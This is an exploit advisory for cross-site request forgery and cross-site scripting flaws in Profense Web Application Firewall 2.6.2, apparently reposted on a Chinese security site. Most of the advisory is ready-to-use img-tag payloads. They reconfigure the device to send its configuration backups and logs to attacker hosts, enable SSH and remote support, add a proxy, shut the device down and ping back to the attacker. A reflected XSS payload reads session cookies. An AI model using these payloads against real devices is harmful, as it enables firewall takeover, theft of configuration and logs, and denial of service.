首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Profense Web Application Firewall 2.6.2 XSRF/XSS Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
Written By Michael Brooks
Special thanks to str0ke!

Affects: Profense Web Application Firewall XSRF and XSS
Version: 2.6.2
download http://www.armorlogic.com/download_software.html

"Defenses against all OWASP Top Ten vulnerabilities"
 Too bad it doesn't defend its self against all of these vulnerabilities....


Chaning configuration:
DNS, SMTP,  NTP servers.
Set a (malcious) remote FTP server or SCP server to backup (steal)
configuration files.   This could be used to steal the configuraitons.
Set a remote syslog server to steal the logs
Enable SSH
Enable SNMP
<img src=https://10.1.1.199:2000/ajax.html?hostname=profense.mydomain.com&gateway=10.1.1.1&dns=10.1.1.1&smtp=10.1.1.1&max_src_conn=100&max_src_conn_rate_num=100&max_src_conn_rate_sec=10&blacklist_exp=3600&ntp=ntp.hacked.com&timezone=CET&syslog=syslog.hacked.com&syslog_ext_l=4&snmp_public=public&snmp_location=&contact=admin%40mydomain.com&ftp_server=ftp.hacked.com&ftp_port=21&ftp_login=user&ftp_passwd=password&ftp_remote_dir=%2Fhijacked_log&scp_server=scp.hacked.com&scp_port=22&scp_login=admin&scp_remote_dir=%2Fhijacked_log&ftp_auto_on=on&scp_auto_on=on&ssh_on=on&remote_support_on=on&action=configuration&do=save>
Apply new configurations:
<img src=https://10.1.1.199:2000/ajax.html?action=restart&do=core>

Add a proxy:
<img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>

Turn off the Proface machine:
<img src=https://10.1.1.199:2000/ajax.html?action=shutdown>

Force the Proface server to ping:
<img src=https://10.1.1.199:2000/ajax.html?action=ping&ip=10.1.1.1>
Could be used to nofiy the attacker that the attack succeeded.

reflective xss:
https://10.1.1.199:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>

# [2009-01-29]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ManageEngine Firewall Analyzer
·D-Link VoIP Phone Adapter XSS/
·PLE CMS 1.0 beta 4.2 (login.ph
·Zoom VoIP Phone Adapater ATA1+
·NetArtMedia Car Portal 1.0 (Au
·Pligg 9.9.5 XSRF Protection By
·Motorola Wimax modem CPEi300 (
·Total Video Player 1.3.7 (.m3u
·dBpowerAMP Audio Player v2 (.p
·SalesCart (Auth Bypass) SQL In
·WFTPD Explorer Pro 1.0 Remote
·ReVou Twitter Clone (XSS/SQL)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved